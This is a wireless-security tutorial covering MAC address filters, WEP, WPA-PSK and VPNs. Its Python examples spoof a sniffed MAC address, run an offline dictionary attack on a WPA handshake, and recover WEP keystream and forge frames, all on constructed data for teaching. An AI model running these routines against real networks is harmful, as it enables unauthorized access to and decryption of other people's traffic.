Wireless Networking for the Paranoid Hacker
by: luminaire
Implementing Basic Wireless Security
We've all done it; we've all seen the insecurity that wireless networking has
brought our world. It's a new frontier, and there are open doors wherever we
turn. Fewer among us are those who have actually sat down and broken an 802.11b
WEP key. Although it is time-consuming, it can be done, especially on business
networks administered by wanna-be network administrators. The point is that we
know the keys can be broken. Where does that leave those of us who want to enjoy
the freedom of wireless? Whether on our own networks or on public access nodes,
we are concerned with both data security and privacy. Here I will cover a few
methods of securing a wireless network, as well as securing your connection over
a public wireless network.
Key Differences
One slight detail to keep in mind whilst reading this article: my suggestions
on home wireless cover mainly security and ways of keeping people off your
network to begin with. If you want to open your network to everyone in range,
you can take most of the tips from the public wireless network section and apply
them.
Home Wireless Security
-Simple Methods
ACL
An ACL, or access control list, is a feature I have found in almost every
wireless router I have come across, and in my opinion it is a useful tool,
though on its own it is not a security control. I can already hear the
objections of those who have defeated these systems or know how to, at least in
theory. ACLs filter on a list of wireless card MAC addresses: the access point
examines the MAC address of any card that attempts to join the network, and if
that MAC is not on the list of approved addresses the card is not permitted to
join. This is defeated by an attacker who sniffs an approved MAC address out of
the air (802.11 frame headers, including both MAC addresses, are never
encrypted, not even on a WEP or WPA network), uses a MAC spoofer to set their
own card to that address, and then joins the network. Once in, it is easy enough
to knock the real user off the network, although strictly speaking you do not
have to in order to use it. My suggestion for a home network is to authorize
only your own cards and the cards of users who are permitted to join. This is
not a sure way to keep unauthorized users out; treat it as a hygiene measure
that raises the bar a little when coupled with real encryption.
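As an added example (not from the article), here is a small model of what the access point's MAC filter actually sees: a constructed, WEP-protected 802.11 data frame, parsed to show that both MAC addresses and the WEP IV sit in the unencrypted header, followed by the one-line "spoof" that defeats the filter. The frame bytes, the MAC addresses and the `acl_allows`/`spoof_sender` helpers are assumptions made for this example.

```python
import struct

# Constructed sample frame (not a real capture): a WEP-protected 802.11 data
# frame from a station to its access point. Layout of the 24-byte MAC header:
#   Frame Control (2) | Duration (2) | Addr1 (6) | Addr2 (6) | Addr3 (6) | Seq Ctl (2)
# With To-DS=1, From-DS=0: Addr1 = BSSID, Addr2 = sender (SA), Addr3 = destination.
SAMPLE_FRAME = bytes.fromhex(
    "0841"            # Frame Control: type=Data, flags To-DS + Protected Frame
    "0000"            # Duration
    "00112233aabb"    # Addr1: BSSID of the AP (assumed)
    "00aabbccddee"    # Addr2: the authorised station's MAC (assumed)
    "001122334455"    # Addr3: destination MAC (assumed)
    "1000"            # Sequence Control: fragment 0, sequence number 1
    "a1b2c3" "00"     # WEP IV (3 bytes) + key index 0: also sent in the clear
) + bytes(20)         # encrypted payload + ICV, opaque to the sniffer; zero padding here

TYPE_NAMES = {0: "mgmt", 1: "ctrl", 2: "data"}


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(p, 16) for p in s.split(":"))


def parse_header(frame: bytes) -> dict:
    """Parse the fixed 24-byte 802.11 MAC header (three-address form)."""
    if len(frame) < 24:
        raise ValueError("frame too short for an 802.11 MAC header")
    fc, duration, a1, a2, a3, seqctl = struct.unpack("<HH6s6s6sH", frame[:24])
    flags = fc >> 8                       # second byte of Frame Control
    info = {
        "type": TYPE_NAMES.get((fc >> 2) & 0x3, "reserved"),
        "subtype": (fc >> 4) & 0xF,
        "to_ds": bool(flags & 0x01),
        "from_ds": bool(flags & 0x02),
        "protected": bool(flags & 0x40),  # the "WEP bit": payload is encrypted
        "addr1": mac_str(a1),
        "addr2": mac_str(a2),             # transmitter: the only thing a MAC filter checks
        "addr3": mac_str(a3),
        "seq": seqctl >> 4,
        "frag": seqctl & 0xF,
        "wep_iv": None,
    }
    # Even when the payload is encrypted, the IV that keys it travels in clear text.
    if info["protected"] and info["type"] == "data" and len(frame) >= 28:
        info["wep_iv"] = frame[24:27].hex()
        info["wep_key_index"] = frame[27] >> 6
    return info


def acl_allows(frame: bytes, allowed_macs: set) -> bool:
    """Model of a router's MAC filter: admit the frame iff Addr2 is on the list."""
    return parse_header(frame)["addr2"] in allowed_macs


def spoof_sender(frame: bytes, new_mac: str) -> bytes:
    """The whole 'attack': overwrite Addr2. Nothing in the header is authenticated.
    (A real card recomputes the frame check sequence on transmit.)"""
    return frame[:10] + mac_bytes(new_mac) + frame[16:]


if __name__ == "__main__":
    allowed = {"00:aa:bb:cc:dd:ee"}       # the home user's ACL (assumed)
    hdr = parse_header(SAMPLE_FRAME)
    print("sniffed sender", hdr["addr2"], "IV", hdr["wep_iv"], "protected", hdr["protected"])
    rogue = spoof_sender(SAMPLE_FRAME, "de:ad:be:ef:00:01")   # attacker's own card
    print("attacker's own MAC allowed?", acl_allows(rogue, allowed))
    print("after spoofing the sniffed MAC?", acl_allows(spoof_sender(rogue, hdr["addr2"]), allowed))
```

The point the parse makes is that the filter has nothing secret to check against: the address it compares is copied out of a header that every sniffer in range can read, and the sender can write anything it likes into that field.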
WEP
WEP, or Wired Equivalent Privacy, is the determined hacker's best friend. WEP
can be broken, and the often-quoted "less than eight hours" is a ceiling, not a
floor. Most of you will read this and conclude that it is weak encryption, unfit
to secure data, and you are right, but there are two things to understand about
where that time goes. Firstly, the attack is statistical: the attacker needs a
large number of captured frames with distinct IVs, so on a quiet network the
sniffing can indeed take hours. Secondly, a patient attacker does not have to
wait for your traffic: capturing one encrypted ARP request and replaying it to
the access point makes the AP answer with a fresh IV every time, producing all
the frames needed in minutes, and the improved statistical attacks that followed
recover a 104-bit key from a few tens of thousands of frames. For my own
personal network the first point is moot in any case, because I have a cron job
which transfers files to a wireless client in gigantic dumps nightly. A
determined attacker can be slowed by rotating WEP keys weekly, or for the
paranoid daily, but if you are that paranoid, why are you using WEP? Key
rotation can only take you so far.
WPA
Many new 802.11g access points allow for use of WPA (Wi-Fi Protected Access).
In its pre-shared key mode (WPA-PSK) a passphrase entered on both sides is
turned into a 256-bit master key from which each client's session keys are
derived. There is no shortcut attack on WPA's encryption comparable to the ones
on WEP; however, WPA-PSK is vulnerable to an offline dictionary attack: anyone
who captures the four-way handshake between a client and the access point (and a
single deauthentication frame will make a client redo it) can try candidate
passphrases at leisure, checking each against the captured handshake without
sending another packet. Each guess costs far more than a step of automated WEP
key recovery, and the attack only works if the passphrase is something a
wordlist would contain: a dictionary word falls, a long random passphrase does
not. WPA is significantly more secure, and if you have the cash and are buying a
dedicated wireless router, I would choose one that supports WPA. Note that the
link to 802.11g is incidental: WPA was designed to run on existing 802.11b
hardware, and many 802.11b products received it through firmware upgrades, so
look for WPA support rather than for the letter "g".
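An added example (not from the article, and not any particular tool's code) of why "dictionary attack" is the right description and what it does and does not reach. It derives the 256-bit pairwise master key from the passphrase and SSID as 802.11i specifies, derives the per-client key from the four-way handshake values a sniffer can see, and then checks a wordlist against the handshake MIC offline. The SSID, MAC addresses, nonces, the EAPOL message body and the wordlist are constructed for the example.

```python
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits.
    This is what WPA-PSK stores in place of a password, and it is reused for every session."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    AA/SPA are the AP's and station's MACs; the nonces travel in handshake messages 1 and 2."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]                      # KCK(16) | KEK(16) | TK(16) | TKIP MIC keys(16)


def eapol_mic(kck: bytes, eapol_frame: bytes, descriptor_version: int = 1) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes."""
    if descriptor_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def supplicant_message2(pmk, aa, spa, anonce, snonce, version=1):
    """What the station sends as handshake message 2: its SNonce plus a MIC under the KCK.
    Returns (frame_with_mic_zeroed, mic). A real EAPOL-Key frame carries more fields,
    but the MIC covers the whole frame either way, so the principle is unchanged."""
    kck = wpa_ptk(pmk, aa, spa, anonce, snonce)[:16]
    frame = b"\x01\x03" + bytes([version]) + snonce + bytes(16)   # constructed body, MIC field zeroed
    return frame, eapol_mic(kck, frame, version)


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, frame_zeroed_mic, observed_mic, version=1):
    """Offline dictionary attack: everything needed was sniffed from messages 1 and 2.
    Each guess costs one PBKDF2 (8192 HMAC-SHA1 calls) plus a few HMACs; nothing is transmitted."""
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame_zeroed_mic, version), observed_mic):
            return candidate
    return None


# Constructed handshake parameters (assumed, not a real capture).
SSID = "homenet"
AA = bytes.fromhex("00112233aabb")                   # access point MAC
SPA = bytes.fromhex("00aabbccddee")                  # station MAC
ANONCE = hashlib.sha256(b"anonce").digest()          # 32-byte nonces, deterministic for the demo
SNONCE = hashlib.sha256(b"snonce").digest()
WORDLIST = ["password", "letmein", "homenet1", "wireless", "qwerty"]


def demo(passphrase: str):
    """Run the handshake under the given passphrase, then try to recover it from WORDLIST."""
    frame, mic = supplicant_message2(wpa_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, frame, mic)


if __name__ == "__main__":
    print("weak passphrase recovered:", demo("letmein"))
    print("random passphrase recovered:", demo("Vq7#mC2p!xL9wT4e"))
```

The cost per guess is fixed by the 4096 PBKDF2 rounds, which is why a passphrase outside any wordlist survives: the attacker's only move is to guess, and the guess space of a long random string is out of reach.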
How WPA Works
What makes WEP weak is its initialization vector (IV). The IV is a 24-bit
number that is prepended to the key that the network administrator (you)
entered into your access point's configuration interface, and the result seeds
RC4 for one frame. A new IV is used for each frame (packet) transmitted, and it
is sent in the clear ahead of the encrypted data. There are two problems with
this. First, 24 bits is a small space and nothing in WEP forbids reusing an IV:
most cards count up from zero or pick at random, so the same IV, and therefore
the same RC4 keystream, comes round again after at most 2^24 frames, on a busy
network within hours. Two frames encrypted under the same IV and key share a
keystream; XOR the two ciphertexts and the keystream cancels, leaving the XOR of
the two plaintexts, and if either plaintext is guessable (ARP, DHCP, protocol
headers) the other falls out, along with a keystream that decrypts and forges
any further frame under that IV. Second, and worse, the way the IV is simply
glued onto the front of the key lets an attacker who collects enough frames with
particular "weak" IVs recover the key itself, and tools automate this. WPA
(TKIP) uses a 48-bit IV, so it does not repeat within the life of a key, and,
more importantly, mixes it into a fresh per-packet key instead of prepending it,
which removes the key-recovery attack. The second way that WPA improves over WEP
is the way users connect to a WPA-enabled AP. When a user connects they are
authenticated using a pre-shared key, or in more advanced configurations through
802.1X against an authentication server (RADIUS, possibly backed by LDAP). A
four-way handshake then derives a fresh pairwise key for that client and session
from the master key and two random nonces, so no two clients share a key and the
master key itself never encrypts traffic; the group key used for broadcast
traffic is rotated periodically. Combined with the longer IV, this makes WPA far
harder to crack. Finally, WPA strengthens the integrity check used in WEP. WEP
appends a 32-bit ICV (integrity check value), a plain CRC-32 of the plaintext,
to every frame to detect modification (injected packets, forgeries). The problem
is that CRC-32 is linear and involves no secret: an intruder can intercept a
frame, flip chosen bits in the encrypted payload, flip the corresponding bits of
the encrypted ICV, and retransmit, and nobody is the wiser. WPA adds a 64-bit
keyed MIC (message integrity code, "Michael") inside the encrypted payload,
computed with a key the attacker does not have and itself covered by the ICV; a
forged frame now fails the MIC, and two MIC failures within a minute trigger
countermeasures that shut the link down and rekey. These improvements over WEP
make WPA a sound security method for any network, at least until they release
802.11i, but that's a topic for another day.
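As an added example (not from the article), the two WEP failures described in the WEP section and above, IV reuse and the linear CRC-32 ICV, carried through in code: a minimal RC4, a WEP frame routine, two constructed frames encrypted under the same IV, and a bit-flip on an encrypted frame that still passes the integrity check. The key (40-bit, for brevity), IV and plaintexts are made up for the example.

```python
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream: key scheduling followed by output generation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32(data: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP: ICV = CRC-32(plaintext); RC4 seeded with IV || key over plaintext || ICV;
    the 3-byte IV is prepended in the clear so the receiver can reseed."""
    body = plaintext + crc32(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok), judged exactly as a receiver would."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4(iv + key, len(body)))
    plaintext, icv = clear[:-4], clear[-4:]
    return plaintext, icv == crc32(plaintext)


def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    """IV reuse: a frame whose plaintext is known (ARP, DHCP, a predictable header) yields
    the keystream for its IV, which decrypts every other frame sent under that IV."""
    return xor(frame[3:], known_plaintext + crc32(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    return xor(frame[3:], keystream)[:-4]


def forge_without_key(frame: bytes, delta: bytes) -> bytes:
    """Flip chosen plaintext bits in an encrypted frame and fix the ICV, without the key.
    CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length),
    so XORing crc(d) ^ crc(zeros) into the encrypted ICV keeps the check valid."""
    iv, body = frame[:3], frame[3:]
    payload_len = len(body) - 4
    d = delta.ljust(payload_len, b"\x00")           # zero wherever nothing changes
    icv_fix = xor(crc32(d), crc32(bytes(payload_len)))
    return iv + xor(body, d + icv_fix)


# Constructed demonstration data (not a capture): a 40-bit key and two frames that a
# careless card sent under the same IV. Both plaintexts are 33 bytes long.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("000001")
P1 = b"GET /index.html HTTP/1.0 user=bob"
P2 = b"PUT /secret.txt HTTP/1.0 user=eve"


def demo():
    """Returns (plaintext of frame 2 recovered via IV reuse, (plaintext, icv_ok) of a forgery)."""
    f1 = wep_encrypt(KEY, IV, P1)
    f2 = wep_encrypt(KEY, IV, P2)
    leaked_p2 = decrypt_with_keystream(f2, keystream_from_known_plaintext(f1, P1))
    d = bytearray(len(P1))
    d[P1.index(b"bob")] ^= ord("b") ^ ord("r")      # turn "bob" into "rob" inside frame 1
    forged = forge_without_key(f1, bytes(d))
    return leaked_p2, wep_decrypt(KEY, forged)


if __name__ == "__main__":
    leaked, (forged_plain, icv_ok) = demo()
    print("recovered from IV reuse:", leaked)
    print("forged frame passes ICV:", icv_ok, forged_plain)
```

Neither step touches the key: the first needs only two frames with the same IV and a guess at one of them, the second needs only the position of the bytes to change. That is the gap a keyed MIC closes.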
Summary for Home Users
For the average user, an ACL combined with either WEP (with key rotation) or,
preferably, WPA will provide adequate security, at least for keeping
unauthorized users off the network. If you want to share your network but
ensure that your own data remains private, see the data security section
below.
Data Security
-VPNs
Any form of connection sharing over a public network, wired or wireless, can be
sniffed. Along with the threat of interception comes the added risk of data
injection: an attacker who can capture your traffic can also inject packets and
forge communications to interfere with it. In many other security articles VPNs
have been listed as a way for users to ensure the confidentiality and
authenticity of their traffic, but only as a last resort or an unsavory method.
Anyone who has ever intercepted "secure" communication over a network knows
that VPNs are an invaluable tool for keeping private information private. There
are several ways of doing this.
About VPNs
VPNs, as they pertain to this article, allow a user to create a secure channel
between two points, whether two hosts on a network, two routers, or two whole
networks. The usual building block is IPsec, which was developed alongside IPv6
and is equally available for IPv4. In tunnel mode the VPN encrypts the original
IP packet, adds an integrity check, wraps the result in a new outer IP packet,
and sends it to the far end of the tunnel; on receipt the outer packet is
stripped, the integrity check and a replay check are applied, and only then is
the inner packet decrypted and forwarded. A VPN thereby assures a user that the
path to the remote end is both encrypted and authenticated, even though it
traverses an insecure network.
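An added example (not from the article, and a simplification of real IPsec rather than its code) of the encapsulate/decapsulate cycle just described, in the shape of ESP: an SPI and sequence number, the encrypted inner packet and an integrity check, with the receiver verifying the check, rejecting replays with the usual sliding window, and only then decrypting. It also shows the injection threat from the Data Security paragraph failing at the integrity check. The keys, SPI and the "inner IP packet" are constructed; the cipher is a keystream from HMAC-SHA256 in counter mode standing in for AES so that the example needs only the standard library.

```python
import hashlib
import hmac
import struct

WINDOW = 64  # anti-replay window size, the minimum recommended by RFC 4303


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key: bytes, spi: int, seq: int, length: int) -> bytes:
    """Stand-in stream cipher (assumption: HMAC-SHA256 in counter mode, not AES).
    Keyed per (SPI, sequence number) so no keystream is ever reused for two packets."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, struct.pack(">IIQ", spi, seq, counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


class TunnelEndpoint:
    """One end of an ESP-like tunnel. Both ends share the SPI and the two keys."""

    def __init__(self, spi: int, enc_key: bytes, auth_key: bytes):
        self.spi, self.enc_key, self.auth_key = spi, enc_key, auth_key
        self.send_seq = 0
        self.recv_high = 0      # highest sequence number accepted so far
        self.recv_bitmap = 0    # bit k set: sequence number recv_high - k was seen

    def encapsulate(self, inner_packet: bytes) -> bytes:
        """SPI | seq | encrypted inner packet | ICV (encrypt-then-MAC over header + ciphertext)."""
        self.send_seq += 1
        header = struct.pack(">II", self.spi, self.send_seq)
        ct = xor(inner_packet, keystream(self.enc_key, self.spi, self.send_seq, len(inner_packet)))
        icv = hmac.new(self.auth_key, header + ct, hashlib.sha256).digest()[:16]
        return header + ct + icv

    def decapsulate(self, packet: bytes) -> bytes:
        """Verify the ICV, then the replay window, then decrypt. ValueError on anything suspect."""
        if len(packet) < 24:
            raise ValueError("truncated packet")
        spi, seq = struct.unpack(">II", packet[:8])
        if spi != self.spi:
            raise ValueError("unknown SPI")
        header_ct, icv = packet[:-16], packet[-16:]
        expected = hmac.new(self.auth_key, header_ct, hashlib.sha256).digest()[:16]
        if not hmac.compare_digest(expected, icv):
            raise ValueError("ICV mismatch: forged or corrupted")   # injected packets die here
        self._check_replay(seq)
        return xor(header_ct[8:], keystream(self.enc_key, spi, seq, len(header_ct) - 8))

    def _check_replay(self, seq: int) -> None:
        """Sliding-window replay check in the style of RFC 4303, run only after a good ICV."""
        if seq == 0:
            raise ValueError("sequence number 0 is never valid")
        if seq > self.recv_high:
            shift = seq - self.recv_high
            self.recv_bitmap = ((self.recv_bitmap << shift) | 1) & ((1 << WINDOW) - 1)
            self.recv_high = seq
            return
        back = self.recv_high - seq
        if back >= WINDOW:
            raise ValueError("too old: outside the replay window")
        if (self.recv_bitmap >> back) & 1:
            raise ValueError("replay: sequence number already accepted")
        self.recv_bitmap |= 1 << back


def make_pair(spi: int = 0x1001):
    """Two endpoints keyed from constructed material (assumed; real IPsec negotiates keys with IKE)."""
    enc_key = hashlib.sha256(b"example-enc-key").digest()
    auth_key = hashlib.sha256(b"example-auth-key").digest()
    return TunnelEndpoint(spi, enc_key, auth_key), TunnelEndpoint(spi, enc_key, auth_key)


def rejection_reason(endpoint: TunnelEndpoint, packet: bytes):
    """The endpoint's reason for dropping the packet, or None if it was accepted."""
    try:
        endpoint.decapsulate(packet)
        return None
    except ValueError as e:
        return str(e)


if __name__ == "__main__":
    client, router = make_pair()
    packet = client.encapsulate(b"inner IP packet: POST /login user=bob")
    print("router decapsulated:", router.decapsulate(packet))
    print("replay:", rejection_reason(router, packet))
    flipped = packet[:20] + bytes([packet[20] ^ 1]) + packet[21:]
    print("bit flip:", rejection_reason(router, flipped))
```

The ordering matters: the ICV is checked before the replay window is touched and before any decryption, so an attacker who can inject into the wireless segment cannot use forged packets to poison the window or to probe the decryption.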
Wireless VPN Routers
Wireless VPN routers are a good one-box solution to the wireless security
problem. Upon joining the wireless network, whether it is open or encrypted,
clients form a VPN tunnel with the wireless router, and from then on all data
over the air is encrypted. This is the easiest solution, but the most expensive.
Keep in mind that the tunnel ends at the router: the wireless hop is protected,
but anything the router forwards on to the Internet is as exposed as it ever
was, so use end-to-end protection (SSH, SSL) for anything sensitive beyond it.
VPN Routers on a Wired Segment
Wired VPN routers are a two-box solution, slightly cheaper than a one-box
wireless VPN router. The actual solution is the same: you establish a VPN tunnel
with a router on the network. Clients access the network through an ordinary
wireless access point, and upon joining the wireless network the client forms a
VPN tunnel with the wired VPN router, securing all connections through that
tunnel. Make sure the only traffic allowed off the wireless segment is VPN
traffic to the VPN router; otherwise a client who joins the wireless network can
simply skip the tunnel.
VPN Wireless Solutions (Reef Edge)
There are several free offerings, such as Reef Edge. Although I have not
personally experimented with Reef Edge, it seems to be a promising wireless VPN
router solution. On that note, many other products exist, including free
bootable Linux router OSs that will do the job. This is the cheapest way, but
the one that requires the most experience.